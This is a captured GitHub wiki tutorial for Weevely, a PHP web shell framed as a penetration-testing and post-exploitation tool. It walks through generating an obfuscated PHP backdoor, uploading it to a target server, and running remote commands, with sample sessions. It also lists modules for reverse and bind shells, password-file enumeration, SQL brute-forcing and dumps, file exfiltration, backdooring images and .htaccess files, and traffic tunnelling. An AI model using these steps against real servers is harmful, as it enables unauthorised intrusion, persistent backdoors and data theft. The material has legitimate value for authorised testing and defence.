Explore GitHub Search Features Blog

118 21

public epinna / Weevely

Code Network Pull Requests 0 Issues 0 Wiki Graphs Home Pages Wiki History Git Access

Tutorial
Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks. Just generate and upload the PHP code on the target web server, and run the Weevely client locally to transmit shell commands.

Prerequisites
Linux
A basic python installation is enough to support Weevely on Linux. Some optional modules require third party software, to use: Module :[Link] install httpfs;

 Module :[Link] install beautifulsoup (you can fetch it from APT with sudo apt-get install python-beautifulsoup in a Debian-like environment).

Windows/MacOS
pyreadline is required in a Windows environment. First download and install the setuptools Python package manager utility from the official site, then run %PYTHONPATH %/Scripts/easy_install.exe beautifulsoup4 pyreadline (this will install the beautifulsoup optional package too). The same goes for a MacOS environment.

Server-side installation
Weevely needs a little PHP backdoor to be installed on the target web server. First of all generate the PHP code with:
# Usage: ./weevely generate <password> [output path] $ ./[Link] generate p4ssw0rd [[Link]] Backdoor file '[Link]' created with password 'p4ssw0rd'.

then upload [Link] to the target web server either by using legit user access or exploiting some web application bugs in a successful penetration test. There are a number of different generators available, see Generators list for more information.

Send commands
Weevely automatically detects the best method to execute system commands on the remote host at startup, here's a sample session:
# Usage: ./weevely <url> <password> $ ./[Link] [Link] p4ssw0rd ________ __ | | | |-----.----.-.--.----' |--.--. | | | | -__| -__| | | -__| | | | |________|_____|____|___/|____|__|___ | v1.0 |_____| Stealth tiny web shell [+] Welcome to Weevely. Browse filesystem and execute system commands. [+] Hint: Use ':help' to list available modules. www-data@[Link]:/var/www/$ Linux www-data@[Link]:/var/www/$ boot dev home lib64 bin cdrom etc [Link] www-data@[Link]:/var/www/$ uname ls / media opt lib mnt root proc sbin run srv selinux tmp sys var usr

When a too restrictive PHP configuration inhibits the system command execution, Weevely falls back to a pure PHP shell (the prompt become (PHP)>) that provides builtin versions of the ls and cd commands and modules execution.

Single commands can also be executed directly from the command line:
# Usage: ./weevely <url> <password> "<command>" $ ./[Link] [Link] p4ssw0rd "uname" Linux

Modules
Weevely's modular structure aims to simplify administration and post-exploitation tasks. Full module description is available in the Modules list page.

Show modules help

Run :help to print the module list:
www-data@[Link]:/var/www/$ :help +--------------------+------------------------------------------------------+ | generator | description | +--------------------+------------------------------------------------------+ | :[Link] | Generate backdoored .htaccess | | :[Link] | Generate obfuscated PHP backdoor | | :[Link] | Backdoor existing image and create related .htaccess | +--------------------+------------------------------------------------------+ +----------------------+----------------------------------------------------------------------+ | module | description | +----------------------+----------------------------------------------------------------------+ | :[Link] | Find wrong system files permissions | | :[Link] | Find wrong file permissions in users home folders | | :[Link] | Enumerate users and /etc/passwd content | | :[Link] | Crawl and enumerate web folders files permissions | | :[Link] | Check php security configurations | | :[Link] | Execute system shell command | | :[Link] | Execute PHP statement | | :[Link] | Collect system informations | | :[Link] | Find files with matching name | | :[Link] | Find files with write, read, execute permissions | | :[Link] | Find files with superuser flags | | :[Link] | Send reverse TCP shell | | :[Link] | Open a shell on TCP port |

| :[Link] | Bruteforce all SQL users | | :[Link] | Bruteforce SQL username | | :[Link] | Edit remote file | | :[Link] | Read remote file | | :[Link] | Download binary/ascii files from target filesystem | | :[Link] | Enumerate remote paths | | :file.upload2web | Upload binary/ascii file into web folders and guess corresponding url | | :[Link] | Upload binary/ascii file into target filesystem | | :[Link] | Remove remote files and folders | | :[Link] | Check remote files type, md5 and permission | | :[Link] | Mount remote filesystem using HTTPfs | | :[Link] | Download binary/ascii files from target filesystem | | :[Link] | Run SQL console and single queries | | :[Link] | Get SQL database dump | | :[Link] | Install and run Proxy to tunnel traffic through target | | :[Link] | Print interface addresses | | :[Link] | Install remote PHP proxy | | :[Link] | Print interfaces addresses | +----------------------+----------------------------------------------------------------------+ Hint: Run ':help <module>' to print detailed usage informations.

To get detailed information about a module, run :help <module name>.

www-data@[Link]:/var/www/$ :help [Link] usage: :[Link] [-chunksize CHUNKSIZE] [-vector {file_put_contents,fwrite}] [-force] lpath rpath Upload binary/ascii file into target filesystem positional arguments: lpath rpath optional arguments: -chunksize CHUNKSIZE -vector {file_put_contents,fwrite}

-force www-data@[Link]:/var/www/$

Module name completion is available by pressing the <tab> key.

Run module
Execute a module with :<module> [options] as described in the help, for example:
www-data@[Link]:/var/www/$ :[Link] /local/home/[Link] /tmp/[Link] True www-data@[Link]:/var/www/$$ ls -al /tmp/[Link] -rw-r--r-- 1 www-data www-data 1812 Jan 9 19:31 /tmp/[Link]

Module options can be set for the entire session by using :set <module> <option>..., every <option> is a argument=value string. Subsequent modules executions will use the specified options.

Script loading
A script is a text file containing one Weevely command per line. To execute a script at runtime, use :load <script path>. Weevely reads a default rc file (~/.weevely/[Link]) at startup, this is used to initialize some parameters before loading modules.

Proxy setting
To run Weevely through an HTTP proxy set the [Link] proxy parameter in the default rc file:
$ cat ~/.weevely/[Link] :set [Link] proxy=[Link] $ ./[Link] [Link] p4ssw0rd ":[Link] client_ip" [Link] www-data@[Link]:/var/www/$

SOCKS4 and SOCKS5 proxies will also work (set socks4://host:port or socks5://host:port respectively). Last edited by epinna, GitHub About us Blog Contact & support GitHub Enterprise Site status Applications

GitHub for Mac GitHub for Windows GitHub for Eclipse GitHub mobile apps Services Gauges: Web analytics Speaker Deck: Presentations Gist: Code snippets Job board Documentation GitHub Help Developer API GitHub Flavored Markdown GitHub Pages More Training Students & teachers The Shop Plans & pricing The Octodex

2013 GitHub, Inc. All rights reserved. Terms of Service Privacy Security